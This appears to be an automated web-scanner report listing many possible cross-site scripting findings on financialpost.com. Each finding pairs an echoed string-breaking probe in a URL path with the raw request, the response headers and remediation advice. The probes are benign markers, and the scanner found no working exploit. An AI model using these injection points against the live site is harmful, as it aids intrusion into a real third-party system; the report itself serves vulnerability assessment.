The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52095'%3bb85c90f4c12 was submitted in the REST URL parameter 1. This input was echoed as 52095';b85c90f4c12 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets52095'%3bb85c90f4c12/data/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43272
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90bb7'%3b3637543487d was submitted in the REST URL parameter 2. This input was echoed as 90bb7';3637543487d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/data90bb7'%3b3637543487d/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36419
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219de'%3bb428df72f46 was submitted in the REST URL parameter 1. This input was echoed as 219de';b428df72f46 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets219de'%3bb428df72f46/detail/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43312
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b430b'%3b1c037b25630 was submitted in the REST URL parameter 2. This input was echoed as b430b';1c037b25630 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/detailb430b'%3b1c037b25630/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43276
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 624ac'%3b26384954959 was submitted in the REST URL parameter 3. This input was echoed as 624ac';26384954959 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/detail/624ac'%3b26384954959 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43318
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87abb'%3b4fc39ea6f62 was submitted in the REST URL parameter 1. This input was echoed as 87abb';4fc39ea6f62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets87abb'%3b4fc39ea6f62/funds/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36474
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a40f3'%3bb938dde38ac was submitted in the REST URL parameter 2. This input was echoed as a40f3';b938dde38ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/fundsa40f3'%3bb938dde38ac/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43256
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5926e'%3b02d83b6f42d was submitted in the REST URL parameter 1. This input was echoed as 5926e';02d83b6f42d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets5926e'%3b02d83b6f42d/funds/profile/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43501
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3ad1'%3bf27dab35307 was submitted in the REST URL parameter 2. This input was echoed as f3ad1';f27dab35307 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/fundsf3ad1'%3bf27dab35307/profile/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43465
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e927'%3b27cd8eb768f was submitted in the REST URL parameter 3. This input was echoed as 1e927';27cd8eb768f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/funds/profile1e927'%3b27cd8eb768f/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43430
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6620c'%3bf0f4d8bb4e8 was submitted in the REST URL parameter 4. This input was echoed as 6620c';f0f4d8bb4e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/funds/profile/6620c'%3bf0f4d8bb4e8 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43497
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18f6'%3bf39282e7ad7 was submitted in the REST URL parameter 1. This input was echoed as e18f6';f39282e7ad7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /marketse18f6'%3bf39282e7ad7/futures/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36515
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c53f'%3b3da8e6e0e07 was submitted in the REST URL parameter 2. This input was echoed as 5c53f';3da8e6e0e07 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/futures5c53f'%3b3da8e6e0e07/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43296
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26105'%3bf9077ffe571 was submitted in the REST URL parameter 1. This input was echoed as 26105';f9077ffe571 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets26105'%3bf9077ffe571/idms-terms.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43169
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74189'%3b8943533dea2 was submitted in the REST URL parameter 2. This input was echoed as 74189';8943533dea2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/74189'%3b8943533dea2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36339
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 968a1'%3b5e5fba5ddd0 was submitted in the REST URL parameter 1. This input was echoed as 968a1';5e5fba5ddd0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets968a1'%3b5e5fba5ddd0/key-numbers/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43412
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8136'%3bb70724e675e was submitted in the REST URL parameter 2. This input was echoed as e8136';b70724e675e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/key-numberse8136'%3bb70724e675e/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43375
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ede9'%3bbdd4c280d2b was submitted in the REST URL parameter 1. This input was echoed as 1ede9';bdd4c280d2b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets1ede9'%3bbdd4c280d2b/news-alerts/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43411
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49f35'%3b67eccc5e32c was submitted in the REST URL parameter 2. This input was echoed as 49f35';67eccc5e32c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/news-alerts49f35'%3b67eccc5e32c/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
